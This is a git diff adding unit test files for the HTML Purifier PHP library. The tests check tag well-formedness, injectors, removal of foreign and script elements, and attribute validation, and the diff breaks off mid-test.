b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndRewindInjectorTest.php new file mode 100644 index 000000000..96c88748d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/EndRewindInjectorTest.php @@ -0,0 +1,33 @@ +<?php + +class HTMLPurifier_Strategy_MakeWellFormed_EndRewindInjectorTest extends HTMLPurifier_StrategyHarness +{ + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_MakeWellFormed(); + $this->config->set('AutoFormat.Custom', array( + new HTMLPurifier_Strategy_MakeWellFormed_EndRewindInjector() + )); + } + function testBasic() { + $this->assertResult(''); + } + function testFunction() { + $this->assertResult('<span>asdf</span>',''); + } + function testFailedFunction() { + $this->assertResult('<span>asd<b>asdf</b>asdf</span>','<span><b></b></span>'); + } + function testPadded() { + $this->assertResult('<b></b><span>asdf</span><b></b>','<b></b><b></b>'); + } + function testDoubled() { + $this->config->set('AutoFormat.Custom', array( + new HTMLPurifier_Strategy_MakeWellFormed_EndRewindInjector(), + new HTMLPurifier_Strategy_MakeWellFormed_EndRewindInjector(), + )); + $this->assertResult('<b></b><span>asdf</span>', '<b></b>'); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/SkipInjector.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/SkipInjector.php new file mode 100644 index 000000000..258346b8d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/SkipInjector.php @@ -0,0 +1,12 @@ +<?php + +class HTMLPurifier_Strategy_MakeWellFormed_SkipInjector extends HTMLPurifier_Injector +{ + public $name = 'EndRewindInjector'; + public $needed = array('span'); + public function handleElement(&$token) { + $token = array(clone $token, clone $token); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/SkipInjectorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/SkipInjectorTest.php new file mode 100644 index 000000000..770b3d84e --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed/SkipInjectorTest.php @@ -0,0 +1,27 @@ +<?php + +class HTMLPurifier_Strategy_MakeWellFormed_SkipInjectorTest extends HTMLPurifier_StrategyHarness +{ + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_MakeWellFormed(); + $this->config->set('AutoFormat.Custom', array( + new HTMLPurifier_Strategy_MakeWellFormed_SkipInjector() + )); + } + function testEmpty() { + $this->assertResult(''); + } + function testMultiply() { + $this->assertResult('<br />', '<br /><br />'); + } + function testMultiplyMultiply() { + $this->config->set('AutoFormat.Custom', array( + new HTMLPurifier_Strategy_MakeWellFormed_SkipInjector(), + new HTMLPurifier_Strategy_MakeWellFormed_SkipInjector() + )); + $this->assertResult('<br />', '<br /><br /><br /><br />'); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormedTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormedTest.php new file mode 100644 index 000000000..c6d775c5a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormedTest.php @@ -0,0 +1,149 @@ +<?php + +class HTMLPurifier_Strategy_MakeWellFormedTest extends HTMLPurifier_StrategyHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_MakeWellFormed(); + } + + function testEmptyInput() { + $this->assertResult(''); + } + + function testWellFormedInput() { + $this->assertResult('This is <b>bold text</b>.'); + } + + function testUnclosedTagTerminatedByDocumentEnd() { + $this->assertResult( + '<b>Unclosed tag, gasp!', + '<b>Unclosed tag, gasp!</b>' + ); + } + + function testUnclosedTagTerminatedByParentNodeEnd() { + $this->assertResult( + '<b><i>Bold and italic?</b>', + '<b><i>Bold and italic?</i></b><i></i>' + ); + } + + function testRemoveStrayClosingTag() { + $this->assertResult( + 'Unused end tags... recycle!</b>', + 'Unused end tags... recycle!' + ); + } + + function testConvertStartToEmpty() { + $this->assertResult( + '<br style="clear:both;">', + '<br style="clear:both;" />' + ); + } + + function testConvertEmptyToStart() { + $this->assertResult( + '<div style="clear:both;" />', + '<div style="clear:both;"></div>' + ); + } + + function testAutoCloseParagraph() { + $this->assertResult( + '<p>Paragraph 1<p>Paragraph 2', + '<p>Paragraph 1</p><p>Paragraph 2</p>' + ); + } + + function testAutoCloseParagraphInsideDiv() { + $this->assertResult( + '<div><p>Paragraphs<p>In<p>A<p>Div</div>', + '<div><p>Paragraphs</p><p>In</p><p>A</p><p>Div</p></div>' + ); + } + + function testAutoCloseListItem() { + $this->assertResult( + '<ol><li>Item 1<li>Item 2</ol>', + '<ol><li>Item 1</li><li>Item 2</li></ol>' + ); + } + + function testAutoCloseColgroup() { + $this->assertResult( + '<table><colgroup><col /><tr></tr></table>', + '<table><colgroup><col /></colgroup><tr></tr></table>' + ); + } + + function testAutoCloseMultiple() { + $this->assertResult( + '<b><span><div></div>asdf', + '<b><span></span></b><div><b></b></div><b>asdf</b>' + ); + } + + function testUnrecognized() { + $this->assertResult( + '<asdf><foobar /><biddles>foo</asdf>', + '<asdf><foobar /><biddles>foo</biddles></asdf>' + ); + } + + function testBlockquoteWithInline() { + $this->config->set('HTML.Doctype', 'XHTML 1.0 Strict'); + $this->assertResult( + // This is actually invalid, but will be fixed by + // ChildDef_StrictBlockquote + '<blockquote>foo<b>bar</b></blockquote>' + ); + } + + function testLongCarryOver() { + $this->assertResult( + '<b>asdf<div>asdf<i>df</i></div>asdf</b>', + '<b>asdf</b><div><b>asdf<i>df</i></b></div><b>asdf</b>' + ); + } + + function testInterleaved() { + $this->assertResult( + '<u>foo<i>bar</u>baz</i>', + '<u>foo<i>bar</i></u><i>baz</i>' + ); + } + + function testNestedOl() { + $this->assertResult( + '<ol><ol><li>foo</li></ol></ol>', + '<ol><ol><li>foo</li></ol></ol>' + ); + } + + function testNestedUl() { + $this->assertResult( + '<ul><ul><li>foo</li></ul></ul>', + '<ul><ul><li>foo</li></ul></ul>' + ); + } + + function testNestedOlWithStrangeEnding() { + $this->assertResult( + '<ol><li><ol><ol><li>foo</li></ol></li><li>foo</li></ol>', + '<ol><li><ol><ol><li>foo</li></ol></ol></li><li>foo</li></ol>' + ); + } + + function testNoAutocloseIfNoParentsCanAccomodateTag() { + $this->assertResult( + '<table><tr><td><li>foo</li></td></tr></table>', + '<table><tr><td>foo</td></tr></table>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed_ErrorsTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed_ErrorsTest.php new file mode 100644 index 000000000..e825e2e2a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed_ErrorsTest.php @@ -0,0 +1,62 @@ +<?php + +class HTMLPurifier_Strategy_MakeWellFormed_ErrorsTest extends HTMLPurifier_Strategy_ErrorsHarness +{ + + protected function getStrategy() { + return new HTMLPurifier_Strategy_MakeWellFormed(); + } + + function testUnnecessaryEndTagRemoved() { + $this->expectErrorCollection(E_WARNING, 'Strategy_MakeWellFormed: Unnecessary end tag removed'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_End('b', array(), 1, 0)); + $this->invoke('</b>'); + } + + function testUnnecessaryEndTagToText() { + $this->config->set('Core.EscapeInvalidTags', true); + $this->expectErrorCollection(E_WARNING, 'Strategy_MakeWellFormed: Unnecessary end tag to text'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_End('b', array(), 1, 0)); + $this->invoke('</b>'); + } + + function testTagAutoclose() { + $this->expectErrorCollection(E_NOTICE, 'Strategy_MakeWellFormed: Tag auto closed', new HTMLPurifier_Token_Start('p', array(), 1, 0)); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Start('div', array(), 1, 6)); + $this->invoke('<p>Foo<div>Bar</div>'); + } + + function testTagCarryOver() { + $b = new HTMLPurifier_Token_Start('b', array(), 1, 0); + $this->expectErrorCollection(E_NOTICE, 'Strategy_MakeWellFormed: Tag carryover', $b); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Start('div', array(), 1, 6)); + $this->invoke('<b>Foo<div>Bar</div>'); + } + + function testStrayEndTagRemoved() { + $this->expectErrorCollection(E_WARNING, 'Strategy_MakeWellFormed: Stray end tag removed'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_End('b', array(), 1, 3)); + $this->invoke('<i></b></i>'); + } + + function testStrayEndTagToText() { + $this->config->set('Core.EscapeInvalidTags', true); + $this->expectErrorCollection(E_WARNING, 'Strategy_MakeWellFormed: Stray end tag to text'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_End('b', array(), 1, 3)); + $this->invoke('<i></b></i>'); + } + + function testTagClosedByElementEnd() { + $this->expectErrorCollection(E_NOTICE, 'Strategy_MakeWellFormed: Tag closed by element end', new HTMLPurifier_Token_Start('b', array(), 1, 3)); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_End('i', array(), 1, 12)); + $this->invoke('<i><b>Foobar</i>'); + } + + function testTagClosedByDocumentEnd() { + $this->expectErrorCollection(E_NOTICE, 'Strategy_MakeWellFormed: Tag closed by document end', new HTMLPurifier_Token_Start('b', array(), 1, 0)); + $this->invoke('<b>Foobar'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed_InjectorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed_InjectorTest.php new file mode 100644 index 000000000..f0e01340a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/MakeWellFormed_InjectorTest.php @@ -0,0 +1,149 @@ +<?php + +class HTMLPurifier_Strategy_MakeWellFormed_InjectorTest extends HTMLPurifier_StrategyHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_MakeWellFormed(); + $this->config->set('AutoFormat.AutoParagraph', true); + $this->config->set('AutoFormat.Linkify', true); + $this->config->set('AutoFormat.RemoveEmpty', true); + generate_mock_once('HTMLPurifier_Injector'); + } + + function testEndHandler() { + $mock = new HTMLPurifier_InjectorMock(); + $b = new HTMLPurifier_Token_End('b'); + $b->skip = array(0 => true); + $b->start = new HTMLPurifier_Token_Start('b'); + $b->start->skip = array(0 => true, 1 => true); + $mock->expectAt(0, 'handleEnd', array($b)); + $i = new HTMLPurifier_Token_End('i'); + $i->start = new HTMLPurifier_Token_Start('i'); + $i->skip = array(0 => true); + $i->start->skip = array(0 => true, 1 => true); + $mock->expectAt(1, 'handleEnd', array($i)); + $mock->expectCallCount('handleEnd', 2); + $mock->setReturnValue('getRewind', false); + $this->config->set('AutoFormat.AutoParagraph', false); + $this->config->set('AutoFormat.Linkify', false); + $this->config->set('AutoFormat.Custom', array($mock)); + $this->assertResult('<i><b>asdf</b>', '<i><b>asdf</b></i>'); + } + + function testErrorRequiredElementNotAllowed() { + $this->config->set('HTML.Allowed', ''); + $this->expectError('Cannot enable AutoParagraph injector because p is not allowed'); + $this->expectError('Cannot enable Linkify injector because a is not allowed'); + $this->assertResult('Foobar'); + } + + function testErrorRequiredAttributeNotAllowed() { + $this->config->set('HTML.Allowed', 'a,p'); + $this->expectError('Cannot enable Linkify injector because a.href is not allowed'); + $this->assertResult('<p>http://example.com</p>'); + } + + function testOnlyAutoParagraph() { + $this->assertResult( + 'Foobar', + '<p>Foobar</p>' + ); + } + + function testParagraphWrappingOnlyLink() { + $this->assertResult( + 'http://example.com', + '<p><a href="http://example.com">http://example.com</a></p>' + ); + } + + function testParagraphWrappingNodeContainingLink() { + $this->assertResult( + '<b>http://example.com</b>', + '<p><b><a href="http://example.com">http://example.com</a></b></p>' + ); + } + + function testParagraphWrappingPoorlyFormedNodeContainingLink() { + $this->assertResult( + '<b>http://example.com', + '<p><b><a href="http://example.com">http://example.com</a></b></p>' + ); + } + + function testTwoParagraphsContainingOnlyOneLink() { + $this->assertResult( + "http://example.com\n\nhttp://dev.example.com", +'<p><a href="http://example.com">http://example.com</a></p> + +<p><a href="http://dev.example.com">http://dev.example.com</a></p>' + ); + } + + function testParagraphNextToDivWithLinks() { + $this->assertResult( + 'http://example.com <div>http://example.com</div>', +'<p><a href="http://example.com">http://example.com</a> </p> + +<div><a href="http://example.com">http://example.com</a></div>' + ); + } + + function testRealisticLinkInSentence() { + $this->assertResult( + 'This URL http://example.com is what you need', + '<p>This URL <a href="http://example.com">http://example.com</a> is what you need</p>' + ); + } + + function testParagraphAfterLinkifiedURL() { + $this->assertResult( +"http://google.com + +<b>b</b>", +"<p><a href=\"http://google.com\">http://google.com</a></p> + +<p><b>b</b></p>" + ); + } + + function testEmptyAndParagraph() { + // This is a fairly degenerate case, but it demonstrates that + // the two don't error out together, at least. + // Change this behavior! + $this->assertResult( +"<p>asdf + +asdf<b></b></p> + +<p></p><i></i>", +"<p>asdf</p> + +<p>asdf</p> + +" + ); + } + + function testRewindAndParagraph() { + $this->assertResult( +"bar + +<p><i></i> + +</p> + +foo", +"<p>bar</p> + + + +<p>foo</p>" + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/RemoveForeignElementsTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/RemoveForeignElementsTest.php new file mode 100644 index 000000000..b3ca1646a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/RemoveForeignElementsTest.php @@ -0,0 +1,115 @@ +<?php + +class HTMLPurifier_Strategy_RemoveForeignElementsTest extends HTMLPurifier_StrategyHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_RemoveForeignElements(); + } + + function testBlankInput() { + $this->assertResult(''); + } + + function testPreserveRecognizedElements() { + $this->assertResult('This is <b>bold text</b>.'); + } + + function testRemoveForeignElements() { + $this->assertResult( + '<asdf>Bling</asdf><d href="bang">Bong</d><foobar />', + 'BlingBong' + ); + } + + function testRemoveScriptAndContents() { + $this->assertResult( + '<script>alert();</script>', + '' + ); + } + + function testRemoveStyleAndContents() { + $this->assertResult( + '<style>.foo {blink;}</style>', + '' + ); + } + + function testRemoveOnlyScriptTagsLegacy() { + $this->config->set('Core.RemoveScriptContents', false); + $this->assertResult( + '<script>alert();</script>', + 'alert();' + ); + } + + function testRemoveOnlyScriptTags() { + $this->config->set('Core.HiddenElements', array()); + $this->assertResult( + '<script>alert();</script>', + 'alert();' + ); + } + + function testRemoveInvalidImg() { + $this->assertResult('<img />', ''); + } + + function testPreserveValidImg() { + $this->assertResult('<img src="foobar.gif" alt="foobar.gif" />'); + } + + function testPreserveInvalidImgWhenRemovalIsDisabled() { + $this->config->set('Core.RemoveInvalidImg', false); + $this->assertResult('<img />'); + } + + function testTextifyCommentedScriptContents() { + $this->config->set('HTML.Trusted', true); + $this->config->set('Output.CommentScriptContents', false); // simplify output + $this->assertResult( +'<script type="text/javascript"><!-- +alert(<b>bold</b>); +// --></script>', +'<script type="text/javascript"> +alert(<b>bold</b>); +// </script>' + ); + } + + function testRequiredAttributesTestNotPerformedOnEndTag() { + $def = $this->config->getHTMLDefinition(true); + $def->addElement('f', 'Block', 'Optional: #PCDATA', false, array('req*' => 'Text')); + $this->assertResult('<f req="text">Foo</f> Bar'); + } + + function testPreserveCommentsWithHTMLTrusted() { + $this->config->set('HTML.Trusted', true); + $this->assertResult('<!-- foo -->'); + } + + function testRemoveTrailingHyphensInComment() { + $this->config->set('HTML.Trusted', true); + $this->assertResult('<!-- foo ----->', '<!-- foo -->'); + } + + function testCollapseDoubleHyphensInComment() { + $this->config->set('HTML.Trusted', true); + $this->assertResult('<!-- bo --- asdf--as -->', '<!-- bo - asdf-as -->'); + } + + function testPreserveCommentsWithLookup() { + $this->config->set('HTML.AllowedComments', array('allowed')); + $this->assertResult('<!-- allowed --><!-- not allowed -->', '<!-- allowed -->'); + } + + function testPreserveCommentsWithRegexp() { + $this->config->set('HTML.AllowedCommentsRegexp', '/^allowed[1-9]$/'); + $this->assertResult('<!-- allowed1 --><!-- not allowed -->', '<!-- allowed1 -->'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/RemoveForeignElements_ErrorsTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/RemoveForeignElements_ErrorsTest.php new file mode 100644 index 000000000..4b4e31074 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/RemoveForeignElements_ErrorsTest.php @@ -0,0 +1,71 @@ +<?php + +class HTMLPurifier_Strategy_RemoveForeignElements_ErrorsTest extends HTMLPurifier_Strategy_ErrorsHarness +{ + + public function setup() { + parent::setup(); + $this->config->set('HTML.TidyLevel', 'heavy'); + } + + protected function getStrategy() { + return new HTMLPurifier_Strategy_RemoveForeignElements(); + } + + function testTagTransform() { + $this->expectErrorCollection(E_NOTICE, 'Strategy_RemoveForeignElements: Tag transform', 'center'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Start('div', array('style' => 'text-align:center;'), 1)); + $this->invoke('<center>'); + } + + function testMissingRequiredAttr() { + // a little fragile, since img has two required attributes + $this->expectErrorCollection(E_ERROR, 'Strategy_RemoveForeignElements: Missing required attribute', 'alt'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Empty('img', array(), 1)); + $this->invoke('<img />'); + } + + function testForeignElementToText() { + $this->config->set('Core.EscapeInvalidTags', true); + $this->expectErrorCollection(E_WARNING, 'Strategy_RemoveForeignElements: Foreign element to text'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Start('invalid', array(), 1)); + $this->invoke('<invalid>'); + } + + function testForeignElementRemoved() { + // uses $CurrentToken.Serialized + $this->expectErrorCollection(E_ERROR, 'Strategy_RemoveForeignElements: Foreign element removed'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Start('invalid', array(), 1)); + $this->invoke('<invalid>'); + } + + function testCommentRemoved() { + $this->expectErrorCollection(E_NOTICE, 'Strategy_RemoveForeignElements: Comment removed'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Comment(' test ', 1)); + $this->invoke('<!-- test -->'); + } + + function testTrailingHyphenInCommentRemoved() { + $this->config->set('HTML.Trusted', true); + $this->expectErrorCollection(E_NOTICE, 'Strategy_RemoveForeignElements: Trailing hyphen in comment removed'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Comment(' test ', 1)); + $this->invoke('<!-- test ---->'); + } + + function testDoubleHyphenInCommentRemoved() { + $this->config->set('HTML.Trusted', true); + $this->expectErrorCollection(E_NOTICE, 'Strategy_RemoveForeignElements: Hyphens in comment collapsed'); + $this->expectContext('CurrentToken', new HTMLPurifier_Token_Comment(' test - test - test ', 1)); + $this->invoke('<!-- test --- test -- test -->'); + } + + function testForeignMetaElementRemoved() { + $this->collector->expectAt(0, 'send', array(E_ERROR, 'Strategy_RemoveForeignElements: Foreign meta element removed')); + $this->collector->expectContextAt(0, 'CurrentToken', new HTMLPurifier_Token_Start('script', array(), 1)); + $this->collector->expectAt(1, 'send', array(E_ERROR, 'Strategy_RemoveForeignElements: Token removed to end', 'script')); + $this->invoke('<script>asdf'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/RemoveForeignElements_TidyTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/RemoveForeignElements_TidyTest.php new file mode 100644 index 000000000..22fc456a7 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/RemoveForeignElements_TidyTest.php @@ -0,0 +1,45 @@ +<?php + +class HTMLPurifier_Strategy_RemoveForeignElements_TidyTest + extends HTMLPurifier_StrategyHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_RemoveForeignElements(); + $this->config->set('HTML.TidyLevel', 'heavy'); + } + + function testCenterTransform() { + $this->assertResult( + '<center>Look I am Centered!</center>', + '<div style="text-align:center;">Look I am Centered!</div>' + ); + } + + function testFontTransform() { + $this->assertResult( + '<font color="red" face="Arial" size="6">Big Warning!</font>', + '<span style="color:red;font-family:Arial;font-size:xx-large;">Big'. + ' Warning!</span>' + ); + } + + function testTransformToForbiddenElement() { + $this->config->set('HTML.Allowed', 'div'); + $this->assertResult( + '<font color="red" face="Arial" size="6">Big Warning!</font>', + 'Big Warning!' + ); + } + + function testMenuTransform() { + $this->assertResult( + '<menu><li>Item 1</li></menu>', + '<ul><li>Item 1</li></ul>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ValidateAttributesTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ValidateAttributesTest.php new file mode 100644 index 000000000..5fc86cbda --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ValidateAttributesTest.php @@ -0,0 +1,232 @@ +<?php + +class HTMLPurifier_Strategy_ValidateAttributesTest extends + HTMLPurifier_StrategyHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_ValidateAttributes(); + } + + function testEmptyInput() { + $this->assertResult(''); + } + + function testRemoveIDByDefault() { + $this->assertResult( + '<div id="valid">Kill the ID.</div>', + '<div>Kill the ID.</div>' + ); + } + + function testRemoveInvalidDir() { + $this->assertResult( + '<span dir="up-to-down">Bad dir.</span>', + '<span>Bad dir.</span>' + ); + } + + function testPreserveValidClass() { + $this->assertResult('<div class="valid">Valid</div>'); + } + + function testSelectivelyRemoveInvalidClasses() { + $this->config->set('HTML.Doctype', 'XHTML 1.1'); + $this->assertResult( + '<div class="valid 0invalid">Keep valid.</div>', + '<div class="valid">Keep valid.</div>' + ); + } + + function testPreserveTitle() { + $this->assertResult( + '<acronym title="PHP: Hypertext Preprocessor">PHP</acronym>' + ); + } + + function testAddXMLLang() { + $this->assertResult( + '<span lang="fr">La soupe.</span>', + '<span lang="fr" xml:lang="fr">La soupe.</span>' + ); + } + + function testOnlyXMLLangInXHTML11() { + $this->config->set('HTML.Doctype', 'XHTML 1.1'); + $this->assertResult( + '<b lang="en">asdf</b>', + '<b xml:lang="en">asdf</b>' + ); + } + + function testBasicURI() { + $this->assertResult('<a href="http://www.google.com/">Google</a>'); + } + + function testInvalidURI() { + $this->assertResult( + '<a href="javascript:badstuff();">Google</a>', + '<a>Google</a>' + ); + } + + function testBdoAddMissingDir() { + $this->assertResult( + '<bdo>Go left.</bdo>', + '<bdo dir="ltr">Go left.</bdo>' + ); + } + + function testBdoReplaceInvalidDirWithDefault() { + $this->assertResult( + '<bdo dir="blahblah">Invalid value!</bdo>', + '<bdo dir="ltr">Invalid value!</bdo>' + ); + } + + function testBdoAlternateDefaultDir() { + $this->config->set('Attr.DefaultTextDir', 'rtl'); + $this->assertResult( + '<bdo>Go right.</bdo>', + '<bdo dir="rtl">Go right.</bdo>' + ); + } + + function testRemoveDirWhenNotRequired() { + $this->assertResult( + '<span dir="blahblah">Invalid value!</span>', + '<span>Invalid value!</span>' + ); + } + + function testTableAttributes() { + $this->assertResult( +'<table frame="above" rules="rows" summary="A test table" border="2" cellpadding="5%" cellspacing="3" width="100%"> + <col align="right" width="4*" /> + <col charoff="5" align="char" width="*" /> + <tr valign="top"> + <th abbr="name">Fiddly name</th> + <th abbr="price">Super-duper-price</th> + </tr> + <tr> + <td abbr="carrot">Carrot Humungous</td> + <td>$500.23</td> + </tr> + <tr> + <td colspan="2">Taken off the market</td> + </tr> +</table>' + ); + } + + function testColSpanIsNonZero() { + $this->assertResult( + '<col span="0" />', + '<col />' + ); + } + + function testImgAddDefaults() { + $this->config->set('Core.RemoveInvalidImg', false); + $this->assertResult( + '<img />', + '<img src="" alt="Invalid image" />' + ); + } + + function testImgGenerateAlt() { + $this->assertResult( + '<img src="foobar.jpg" />', + '<img src="foobar.jpg" alt="foobar.jpg" />' + ); + } + + function testImgAddDefaultSrc() { + $this->config->set('Core.RemoveInvalidImg', false); + $this->assertResult( + '<img alt="pretty picture" />', + '<img alt="pretty picture" src="" />' + ); + } + + function testImgRemoveNonRetrievableProtocol() { + $this->config->set('Core.RemoveInvalidImg', false); + $this->assertResult( + '<img src="mailto:foo@example.com" />', + '<img alt="mailto:foo@example.com" src="" />' + ); + } + + function testPreserveRel() { + $this->config->set('Attr.AllowedRel', 'nofollow'); + $this->assertResult('<a href="foo" rel="nofollow" />'); + } + + function testPreserveTarget() { + $this->config->set('Attr.AllowedFrameTargets', '_top'); + $this->config->set('HTML.Doctype', 'XHTML 1.0 Transitional'); + $this->assertResult('<a href="foo" target="_top" />'); + } + + function testRemoveTargetWhenNotSupported() { + $this->config->set('HTML.Doctype', 'XHTML 1.0 Strict'); + $this->config->set('Attr.AllowedFrameTargets', '_top'); + $this->assertResult( + '<a href="foo" target="_top" />', + '<a href="foo" />' + ); + } + + function testKeepAbsoluteCSSWidthAndHeightOnImg() { + $this->assertResult( + '<img src="" alt="" style="width:10px;height:10px;border:1px solid #000;" />' + ); + } + + function testRemoveLargeCSSWidthAndHeightOnImg() { + $this->assertResult( + '<img src="" alt="" style="width:10000000px;height:10000000px;border:1px solid #000;" />', + '<img src="" alt="" style="border:1px solid #000;" />' + ); + } + + function testRemoveLargeCSSWidthAndHeightOnImgWithUserConf() { + $this->config->set('CSS.MaxImgLength', '1px'); + $this->assertResult( + '<img src="" alt="" style="width:1mm;height:1mm;border:1px solid #000;" />', + '<img src="" alt="" style="border:1px solid #000;" />' + ); + } + + function testKeepLargeCSSWidthAndHeightOnImgWhenToldTo() { + $this->config->set('CSS.MaxImgLength', null); + $this->assertResult( + '<img src="" alt="" style="width:10000000px;height:10000000px;border:1px solid #000;" />' + ); + } + + function testKeepPercentCSSWidthAndHeightOnImgWhenToldTo() { + $this->config->set('CSS.MaxImgLength', null); + $this->assertResult( + '<img src="" alt="" style="width:100%;height:100%;border:1px solid #000;" />' + ); + } + + function testRemoveRelativeCSSWidthAndHeightOnImg() { + $this->assertResult( + '<img src="" alt="" style="width:10em;height:10em;border:1px solid #000;" />', + '<img src="" alt="" style="border:1px solid #000;" />' + ); + } + + function testRemovePercentCSSWidthAndHeightOnImg() { + $this->assertResult( + '<img src="" alt="" style="width:100%;height:100%;border:1px solid #000;" />', + '<img src="" alt="" style="border:1px solid #000;" />' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ValidateAttributes_IDTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ValidateAttributes_IDTest.php new file mode 100644 index 000000000..c8c750723 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ValidateAttributes_IDTest.php @@ -0,0 +1,63 @@ +<?php + +class HTMLPurifier_Strategy_ValidateAttributes_IDTest extends HTMLPurifier_StrategyHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_ValidateAttributes(); + $this->config->set('Attr.EnableID', true); + } + + + function testPreserveIDWhenEnabled() { + $this->assertResult('<div id="valid">Preserve the ID.</div>'); + } + + function testRemoveInvalidID() { + $this->assertResult( + '<div id="0invalid">Kill the ID.</div>', + '<div>Kill the ID.</div>' + ); + } + + function testRemoveDuplicateID() { + $this->assertResult( + '<div id="valid">Valid</div><div id="valid">Invalid</div>', + '<div id="valid">Valid</div><div>Invalid</div>' + ); + } + + function testAttributeKeyCaseInsensitivity() { + $this->assertResult( + '<div ID="valid">Convert ID to lowercase.</div>', + '<div id="valid">Convert ID to lowercase.</div>' + ); + } + + function testTrimWhitespace() { + $this->assertResult( + '<div id=" valid ">Trim whitespace.</div>', + '<div id="valid">Trim whitespace.</div>' + ); + } + + function testIDBlacklist() { + $this->config->set('Attr.IDBlacklist', array('invalid')); + $this->assertResult( + '<div id="invalid">Invalid</div>', + '<div>Invalid</div>' + ); + } + + function testNameConvertedToID() { + $this->config->set('HTML.TidyLevel', 'heavy'); + $this->assertResult( + '<a name="foobar" />', + '<a id="foobar" />' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ValidateAttributes_TidyTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ValidateAttributes_TidyTest.php new file mode 100644 index 000000000..d4eeeebfc --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Strategy/ValidateAttributes_TidyTest.php @@ -0,0 +1,351 @@ +<?php + +class HTMLPurifier_Strategy_ValidateAttributes_TidyTest extends HTMLPurifier_StrategyHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_Strategy_ValidateAttributes(); + $this->config->set('HTML.TidyLevel', 'heavy'); + } + + function testConvertCenterAlign() { + $this->assertResult( + '<h1 align="center">Centered Headline</h1>', + '<h1 style="text-align:center;">Centered Headline</h1>' + ); + } + + function testConvertRightAlign() { + $this->assertResult( + '<h1 align="right">Right-aligned Headline</h1>', + '<h1 style="text-align:right;">Right-aligned Headline</h1>' + ); + } + + function testConvertLeftAlign() { + $this->assertResult( + '<h1 align="left">Left-aligned Headline</h1>', + '<h1 style="text-align:left;">Left-aligned Headline</h1>' + ); + } + + function testConvertJustifyAlign() { + $this->assertResult( + '<p align="justify">Justified Paragraph</p>', + '<p style="text-align:justify;">Justified Paragraph</p>' + ); + } + + function testRemoveInvalidAlign() { + $this->assertResult( + '<h1 align="invalid">Invalid Headline</h1>', + '<h1>Invalid Headline</h1>' + ); + } + + function testConvertTableLengths() { + $this->assertResult( + '<td width="5%" 